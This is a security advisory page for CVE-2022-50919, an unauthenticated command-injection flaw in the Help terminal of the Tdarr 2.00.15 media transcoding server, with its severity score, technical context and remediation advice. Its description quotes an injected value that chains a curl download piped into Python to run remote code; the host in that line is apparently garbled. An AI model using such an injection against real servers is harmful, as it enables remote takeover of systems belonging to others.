CVE-2022-50919
CRITICALCVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3Description
Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.
Analysis
Tdarr 2.00.15 media transcoding server has unauthenticated RCE through command injection in the Help terminal. Commands can be chained without any input filtering. PoC available.
Technical Context
The Help terminal passes input directly to a system shell (CWE-78) without sanitization. Commands can be chained using semicolons.
Affected Products
Tdarr 2.00.15
Remediation
Update Tdarr. Restrict web interface access.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today